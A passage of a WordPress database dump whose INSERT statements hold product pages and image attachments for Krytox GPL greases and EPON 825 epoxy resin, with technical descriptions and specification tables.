INSERT INTO `wp_posts` VALUES (831, 2, '2016-08-25 15:31:57', '2016-08-25 15:31:57', '', 'Krytox GPL 213', '', 'inherit', 'open', 'closed', '', 'shutterstock_279918557', '', '', '2016-09-27 16:41:43', '2016-09-27 16:41:43', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_279918557.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (833, 2, '2016-08-25 15:32:17', '2016-08-25 15:32:17', '', 'shutterstock_366080819', '', 'inherit', 'open', 'closed', '', 'shutterstock_366080819', '', '', '2016-08-25 15:32:17', '2016-08-25 15:32:17', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_366080819.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (834, 2, '2016-08-25 15:32:25', '2016-08-25 15:32:25', '', 'shutterstock_385603582', '', 'inherit', 'open', 'closed', '', 'shutterstock_385603582', '', '', '2016-08-25 15:32:25', '2016-08-25 15:32:25', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_385603582.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (836, 2, '2016-08-25 15:32:55', '2016-08-25 15:32:55', '', 'Krytox GPL 214', '', 'inherit', 'open', 'closed', '', 'shutterstock_416352307', '', '', '2016-09-27 16:42:40', '2016-09-27 16:42:40', '', 819, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_416352307.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (838, 2, '2016-08-25 15:38:19', '2016-08-25 15:38:19', '', 'Krytox GPL 215', '', 'inherit', 'open', 'closed', '', 'shutterstock_60848668', '', '', '2016-09-27 18:59:43', '2016-09-27 18:59:43', '', 822, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_60848668.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (839, 3, '2016-08-25 18:00:00', '2016-08-25 18:00:00', '', 'EPIKURE', '', 'inherit', 'open', 'closed', '', 'epikure', '', '', '2016-08-25 18:00:00', '2016-08-25 18:00:00', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIKURE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (840, 3, '2016-08-25 18:15:43', '2016-08-25 18:15:43', '', 'EPIREZ', '', 'inherit', 'open', 'closed', '', 'epirez', '', '', '2016-08-25 18:15:43', '2016-08-25 18:15:43', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/EPIREZ.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (841, 3, '2016-08-25 18:29:21', '2016-08-25 18:29:21', '', 'Heloxy', '', 'inherit', 'open', 'closed', '', 'heloxy', '', '', '2016-08-25 18:29:21', '2016-08-25 18:29:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Heloxy.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (842, 3, '2016-08-25 18:55:40', '2016-08-25 18:55:40', '<p class="Section1">EPON 825 is a high purity bisphenol <span class="GramE">A</span> epichlorohydrin epoxy resin. As a result, the viscosity of this product is lower than standard bisphenol <span class="GramE">A</span>liquid resins without the use of diluents or modifiers. Resin/curing agent systems based on EPON 825 have greater clarity, chemical resistance, higher heat distortion temperature, and lower electrical conductivity than can be obtained with most other standard resins. Due to the high purity, the resin may form crystals. The crystals can be converted to liquid without damaging the resin by opening the drum bung and heating between 45 °C (113 °F) and 50 °C (122 °F). The tendency to crystallize can also be reduced by adding either 5% to 10% of para-tertiary-butyl phenol glycidyl ether or 20% to 30% of EPON Resin 862, a bisphenol F (BPF) epoxy resin.</p>\r\n<p class="Section1"></p>\r\n<p class="Section1"><span style="text-decoration: underline;"><strong>Application Areas/Suggested Uses</strong></span></p>\r\n\r\n<div class="Section1">\r\n<ul>\r\n 	<li>Blend with high performance multifunctional epoxy resins to reduce viscosity</li>\r\n 	<li>Electrical castings and encapsulations</li>\r\n 	<li>Low volatile organic compound (VOC) coatings</li>\r\n 	<li>Aerospace and specialty adhesives</li>\r\n 	<li>Specialized tooling</li>\r\n</ul>\r\n</div>\r\n<span style="text-decoration: underline;"><strong>Benefits</strong></span>\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Reacts with a full range of curing agents</li>\r\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\r\n</ul>\r\n<span style="text-decoration: underline;"><strong>General Information</strong></span>\r\n\r\nWith EPON Resin 825 you get the convenience of a low viscosity resin without the presence of a diluent which can lower performance properties of cured systems. Also, you get better performance from cured systems than can be obtained using similar resins which are less pure and higher in viscosity. EPON Resin 825 has these benefits because, unlike other resins, it is composed mainly of a single molecular structure. In general you can expect to obtain castings with EPON Resin 825 which have high heat distortion temperature. The low color of EPON Resin 825 will produce low color castings suitable for such optically demanding applications as LEDs and LCDs. The low viscosity permits degassing at high vacuum even at elevated temperatures to avoid bubble formation in the final product. EPON 825 can be used with all of the curing <span class="GramE">agents</span> common to EPON Resin 828 systems. This provides a full range of curing temperatures, pot life and handling characteristics to choose from.\r\n\r\n<span style="text-decoration: underline;"><strong>Sales Specification</strong></span>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Weight per Epoxide</td>\r\n<td valign="top" width="72">\r\n<p align="center">g/eq</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">175 – 180</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1652</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Viscosity at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">P</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">50 – 65</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D445</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Color</td>\r\n<td valign="top" width="72">\r\n<p align="center">Gardner</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">1 max.</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1544</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">&nbsp;</td>\r\n<td valign="top" width="72">\r\n<p align="center"></p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center"></p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center"></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style="text-decoration: underline;"><strong>Typical Properties</strong></span>\r\n<table border="1" cellspacing="0" cellpadding="3">\r\n<tbody>\r\n<tr>\r\n<td valign="top" width="211">Property</td>\r\n<td valign="top" width="72">\r\n<p align="center">Units</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">Value</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">Test Method/Standard</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Density at 25°C</td>\r\n<td valign="top" width="72">\r\n<p align="center">lb/gal</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center">9.7 – 9.8</p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center">ASTM D1475</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Saponifiable chloride</td>\r\n<td valign="top" width="72">\r\n<p align="center">% wt.</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center"><span class="GramE">0.03 max.</span></p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center"></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign="top" width="211">Sodium <sup>1</sup></td>\r\n<td valign="top" width="72">\r\n<p align="center">ppm</p>\r\n</td>\r\n<td valign="top" width="132">\r\n<p align="center"><span class="GramE">2 max.</span></p>\r\n</td>\r\n<td valign="top" width="175">\r\n<p align="center"></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\nMiller-Stephenson is an Epon 825 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPON™ 825', 'EPON™ Resin 825 is a high purity bisphenol A epichlorohydrin epoxy resin. As a result, the viscosity of this product is lower than standard bisphenol A liquid resins without the use of diluents or modifiers. Resin/curing agent systems based on EPON 825 have greater clarity, chemical resistance, higher heat distortion temperature, and lower electrical conductivity than can be obtained with most other standard resins. Benefits include:\r\n<ul>\r\n 	<li>Low viscosity</li>\r\n 	<li>Low color</li>\r\n 	<li>Reacts with a full range of curing agents</li>\r\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\r\n</ul>', 'publish', 'open', 'closed', '', 'epon-825', '', '', '2016-10-31 15:37:06', '2016-10-31 15:37:06', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=842', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (843, 2, '2016-08-25 18:34:33', '2016-08-25 18:34:33', 'The Krytox GPL 221 grease contains an anti-corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings. Krytox oils and greases are silicone free. They do not contain any VOC materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\r\n\r\nThe fully fluorinated Krytox GPL 221 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n', 'GPL 221', 'Krytox GPL 201 has a Oil Viscosity of 7.8 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -70°C to 104°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-221', '', '', '2016-10-04 14:36:34', '2016-10-04 14:36:34', '', 0, 'https://132.148.10.86/wordpress/product/gpl-221/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (844, 2, '2016-08-25 18:35:36', '2016-08-25 18:35:36', 'The Krytox GPL 223 grease contains an anti-corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings. Krytox oils and greases are silicone free. They do not contain any VOC materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\r\n\r\nThe fully fluorinated Krytox GPL 223 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n', 'GPL 223', 'Krytox GPL 223 has a Oil Viscosity of 30 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -60°C to 154°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-223', '', '', '2016-10-04 14:37:37', '2016-10-04 14:37:37', '', 0, 'https://132.148.10.86/wordpress/product/gpl-222/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (845, 2, '2016-08-25 18:36:09', '2016-08-25 18:36:09', '', 'Krytox GPL 216', '', 'inherit', 'open', 'closed', '', 'shutterstock_333094712', '', '', '2016-09-27 19:05:49', '2016-09-27 19:05:49', '', 844, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_333094712.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (846, 2, '2016-08-25 18:39:13', '2016-08-25 18:39:13', 'The Krytox GPL 222 grease contains an anti-corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings. Krytox oils and greases are silicone free. They do not contain any VOC materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\r\n\r\nThe fully fluorinated Krytox GPL 222 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n', 'GPL 222', 'Krytox GPL 222 has a Oil Viscosity of 15 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -63°C to 132°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-222', '', '', '2016-10-04 14:37:05', '2016-10-04 14:37:05', '', 0, 'https://132.148.10.86/wordpress/product/gpl-222-2/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (847, 2, '2016-08-25 18:40:10', '2016-08-25 18:40:10', 'The Krytox GPL 224 grease contains an anti-corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings. Krytox oils and greases are silicone free. They do not contain any VOC materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\r\n\r\nThe fully fluorinated Krytox GPL 224 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n', 'GPL 224', 'Krytox GPL 224 has a Oil Viscosity of 60 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -51°C to 179°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />\r\n', 'publish', 'open', 'closed', '', 'krytox-gpl-224', '', '', '2016-10-04 14:38:26', '2016-10-04 14:38:26', '', 0, 'https://132.148.10.86/wordpress/product/gpl-224/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (848, 2, '2016-08-25 18:41:08', '2016-08-25 18:41:08', 'The Krytox GPL 225 grease contains an anti-corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings. Krytox oils and greases are silicone free. They do not contain any VOC materials or chlorine and are not hazardous to the atmosphere or ozone layer. They are biologically and environmentally inert.\r\n\r\nThe fully fluorinated Krytox GPL 225 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n', 'GPL 225', 'Krytox GPL 225 has a Oil Viscosity of 160 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 204°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-225', '', '', '2016-10-04 14:40:12', '2016-10-04 14:40:12', '', 0, 'https://132.148.10.86/wordpress/product/gpl-225/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (849, 2, '2016-08-25 18:41:44', '2016-08-25 18:41:44', '', 'Krytox GPL 225', '', 'inherit', 'open', 'closed', '', 'shutterstock_159894728', '', '', '2016-09-27 20:05:27', '2016-09-27 20:05:27', '', 848, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_159894728.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (850, 2, '2016-08-25 18:45:46', '2016-08-25 18:45:46', 'Krytox GPL 226 provides protection from rusting, hightemperature corrosion, and antiwear. It has excellent lubrication over a broad temperature range. Krytox GPL 226 is nonflammable, oxygen compatible, and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\r\n\r\nTypical applications include corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, linear bearings, high-temperature fans,\r\nclean rooms, chlorine service, textile equipment, tenter frames, high-speed motors, instrument bearings, sealed for life motors, conveyor system in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, CV joints, wheel bearings, universal joints, clutch throw out bearings, paint plant conveyor bearings, ventilation fan bearings, valve lubrication, and starter bearings.\r\n\r\nThe fully fluorinated Krytox GPL 226 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n', 'GPL 226', 'Krytox GPL 226 has a Oil Viscosity of 243 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -36°C to 260°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-226', '', '', '2016-10-04 14:45:32', '2016-10-04 14:45:32', '', 0, 'https://132.148.10.86/wordpress/product/gpl-226/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (851, 2, '2016-08-25 18:47:15', '2016-08-25 18:47:15', '', 'Krytox GPL 226', '', 'inherit', 'open', 'closed', '', 'shutterstock_92739160', '', '', '2016-09-27 20:06:35', '2016-09-27 20:06:35', '', 850, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/shutterstock_92739160.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (852, 2, '2016-08-25 18:57:03', '2016-08-25 18:57:03', 'Krytox GPL 227 grease provides protection from rusting, high temperature corrosion, and antiwear. It has excellent lubrication over a broad temperature range. Krytox GPL 227 is nonflammable, oxygen compatible, and chemically inert. Krytox allows extended lubrication intervals and longer equipment life.\r\n\r\nTypical applications include corrugator and paper machine bearings, aluminum can manufacturing bearings, vacuum sputtering machines, welding machines, linear bearings, high temperature fans,\r\nclean rooms, chlorine service, textile equipment, tenter frames, high speed motors, instrument bearings, sealed for life motors, conveyor system in glass and aluminum plants, textile calendar roll bearings, brick kiln car bearings, CV joints, wheel bearings, universal joints, clutch throwout bearings, paint plant conveyor bearings, ventilation fan bearings, valve lubrication, and starter bearings.\r\n\r\nThe fully fluorinated Krytox GPL 227 high-temperature stability provides bottom-line savings from improved reliability and a reduction in grease usage and manpower through extended relubrication intervals. Excellent film strength reduces wear to reduce maintenance costs. Under high loads the viscosity increases to provide support and absorb the pressure.\r\n\r\nNew components often have organic rust preventive oils or greases on them to prevent damage while they are in storage before use. New bearings should be inspected for damage and cleanliness before use. The components must be completely cleaned of greases or preservative oils when using Krytox as a lubricant. Failure to do so could result in reduced bearing life. Bearing life tests on un-cleaned bearings have shown reduced life in high temperature, high speed tests where the bearing was filled with a minimum amount of grease. The preservatives coat the metal surface to prevent rusting so they can also prevent the grease from adhering, causing them to be thrown off by the action of the bearing. They could also oxidize and harden and can create debris which will contaminate the grease. \r\n\r\nKrytox lubricants provide longer lasting lubrication that reduces frequency of re-lubrication, not only reducing operating costs, but also reducing waste and potential impact on the environment. Krytox lubricants are undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture or high temperatures. The original properties of the fluids can be restored through regeneration; thus, reducing or minimizing disposal and incineration. Chemours has a regeneration program that reclaims PFPE fluid. This lowers the overall cost of the fluids, and reduces or minimizes safety and environmental disposal problems.\r\n\r\n', 'GPL 227', 'Krytox GPL 227 has a Oil Viscosity of 450 cSt at 40°C.\r\n<br /><br />\r\nEstimated useful temperature range is -30°C to 288°C.\r\n<br /><br />\r\n<img class="alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/krytox-authorized-distributor-3-e1474291247159.jpg" alt="Krytox Authorized Distributor" />', 'publish', 'open', 'closed', '', 'krytox-gpl-227', '', '', '2016-10-04 14:48:27', '2016-10-04 14:48:27', '', 0, 'https://132.148.10.86/wordpress/product/gpl-227/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (854, 2, '2016-08-25 19:35:11', '2016-08-25 19:35:11', '', '222n', '', 'inherit', 'open', 'closed', '', '222n', '', '', '2016-08-25 19:35:11', '2016-08-25 19:35:11', '', 190, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/222n.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (858, 3, '2016-10-31 15:36:09', '2016-10-31 15:36:09', '<p class="Section1">EPON 825 is a high purity bisphenol <span class="GramE">A</span> epichlorohydrin epoxy resin. As a result, the viscosity of this product is lower than standard bisphenol <span class="GramE">A</span>liquid resins without the use of diluents or modifiers. Resin/curing agent systems based on EPON 825 have greater clarity, chemical resistance, higher heat distortion temperature, and lower electrical conductivity than can be obtained with most other standard resins. Due to the high purity, the resin may form crystals. The crystals can be converted to liquid without damaging the resin by opening the drum bung and heating between 45 °C (113 °F) and 50 °C (122 °F). The tendency to crystallize can also be reduced by adding either 5% to 10% of para-tertiary-butyl phenol glycidyl ether or 20% to 30% of EPON Resin 862, a bisphenol F (BPF) epoxy resin.</p>\n<p class="Section1"></p>\n<p class="Section1"><span style="text-decoration: underline;"><strong>Application Areas/Suggested Uses</strong></span></p>\n\n<div class="Section1">\n<ul>\n 	<li>Blend with high performance multifunctional epoxy resins to reduce viscosity</li>\n 	<li>Electrical castings and encapsulations</li>\n 	<li>Low volatile organic compound (VOC) coatings</li>\n 	<li>Aerospace and specialty adhesives</li>\n 	<li>Specialized tooling</li>\n</ul>\n</div>\n<span style="text-decoration: underline;"><strong>Benefits</strong></span>\n<ul>\n 	<li>Low viscosity</li>\n 	<li>Low color</li>\n 	<li>Reacts with a full range of curing agents</li>\n 	<li>Produces high-strength cured systems resistant to chemical attack</li>\n</ul>\n<span style="text-decoration: underline;"><strong>General Information</strong></span>\n\nWith EPON Resin 825 you get the convenience of a low viscosity resin without the presence of a diluent which can lower performance properties of cured systems. Also, you get better performance from cured systems than can be obtained using similar resins which are less pure and higher in viscosity. EPON Resin 825 has these benefits because, unlike other resins, it is composed mainly of a single molecular structure. In general you can expect to obtain castings with EPON Resin 825 which have high heat distortion temperature. The low color of EPON Resin 825 will produce low color castings suitable for such optically demanding applications as LEDs and LCDs. The low viscosity permits degassing at high vacuum even at elevated temperatures to avoid bubble formation in the final product. EPON 825 can be used with all of the curing <span class="GramE">agents</span> common to EPON Resin 828 systems. This provides a full range of curing temperatures, pot life and handling characteristics to choose from.\n\n<span style="text-decoration: underline;"><strong>Sales Specification</strong></span>\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Weight per Epoxide</td>\n<td valign="top" width="72">\n<p align="center">g/eq</p>\n</td>\n<td valign="top" width="132">\n<p align="center">175 – 180</p>\n</td>\n<td valign="top" 